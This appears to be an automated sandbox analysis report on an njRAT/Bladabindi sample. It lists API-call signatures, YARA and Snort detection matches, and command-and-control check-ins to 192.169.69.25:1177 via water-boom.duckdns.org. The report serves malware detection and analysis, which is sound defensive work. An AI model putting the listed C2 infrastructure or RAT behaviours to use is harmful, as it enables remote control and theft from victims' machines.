        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose,1_2_00B2449B
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00B2C7E8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2C75D FindFirstFileW,FindClose,1_2_00B2C75D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00B2F021
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00B2F17E
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00B2F47F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00B23833
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00B23B56
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00B2BD48
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose,12_2_0040449B
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040C75D FindFirstFileW,FindClose,12_2_0040C75D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0040C7E8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0040F021
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0040F17E
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0040F47F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00403833
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00403B56
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0040BD48
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior

        Networking

        barindex
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49162 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49163 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49164 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49165 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49166 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49167 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49168 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49169 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49170 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49171 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49172 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49173 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49174 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49175 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49176 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49177 -> 192.169.69.25:1177
        Source: TrafficSnort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49178 -> 192.169.69.25:1177
        Source: unknownDNS query: name: water-boom.duckdns.org
        Source: Joe Sandbox ViewIP Address: 192.169.69.25 192.169.69.25
        Source: Joe Sandbox ViewIP Address: 192.169.69.25 192.169.69.25
        Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
        Source: global trafficDNS traffic detected: DNS query: water-boom.duckdns.org
        Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.872864488.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395438531.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.coh
        Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/cb
        Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
        Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B3427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00B3427A
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0041427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0041427A
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B4CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00B4CB26
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0042CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_0042CB26

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR

        System Summary

        barindex
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: This is a third-party compiled AutoIt script.1_2_00AC3B4C
        Source: Tr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2ccbde9e-c
        Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_a087d829-7
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: This is a third-party compiled AutoIt script.12_2_003A3B4C
        Source: Tr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d5d18cac-2
        Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_ee892166-0
        Source: Tr.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_43b68f85-8
        Source: Tr.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_ed1a719d-c
        Source: C:\Users\user\Desktop\._cache_1.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B25264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00B25264
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00405264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00405264
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.tmpJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0042200C0_2_0042200C
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0041A2170_2_0041A217
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004122160_2_00412216
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0042435D0_2_0042435D
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004033C00_2_004033C0
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004125E80_2_004125E8
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044663B0_2_0044663B
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004096A00_2_004096A0
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004138010_2_00413801
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0042096F0_2_0042096F
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004129D00_2_004129D0
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004119E30_2_004119E3
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0041C9AE0_2_0041C9AE
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0047EA6F0_2_0047EA6F
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040FA100_2_0040FA10
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00423C810_2_00423C81
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00411E780_2_00411E78
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00442E0C0_2_00442E0C
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00420EC00_2_00420EC0
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044CF170_2_0044CF17
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00444FD20_2_00444FD2
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B408E21_2_00B408E2
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00ACE8001_2_00ACE800
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE33071_2_00AE3307
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00ACE0601_2_00ACE060
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD41401_2_00AD4140
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE23451_2_00AE2345
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B404651_2_00B40465
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF64521_2_00AF6452
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF25AE1_2_00AF25AE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE277A1_2_00AE277A
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD68411_2_00AD6841
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF69C41_2_00AF69C4
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B289321_2_00B28932
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B1E9281_2_00B1E928
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF890F1_2_00AF890F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD89681_2_00AD8968
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AECCA11_2_00AECCA1
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF6F361_2_00AF6F36
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD70FE1_2_00AD70FE
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD31901_2_00AD3190
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AC12871_2_00AC1287
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AEF3591_2_00AEF359
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD56801_2_00AD5680
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE16041_2_00AE1604
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AD58C01_2_00AD58C0
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE78131_2_00AE7813
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE1AF81_2_00AE1AF8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AEDAF51_2_00AEDAF5
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF9C351_2_00AF9C35
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B47E0D1_2_00B47E0D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00ACFE401_2_00ACFE40
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AEBF261_2_00AEBF26
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE1F101_2_00AE1F10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D7F8364_2_000007FE93D7F836
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D797E84_2_000007FE93D797E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D805E24_2_000007FE93D805E2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D7F3394_2_000007FE93D7F339
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D745C54_2_000007FE93D745C5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93E414164_2_000007FE93E41416
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003AE80012_2_003AE800
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_004208E212_2_004208E2
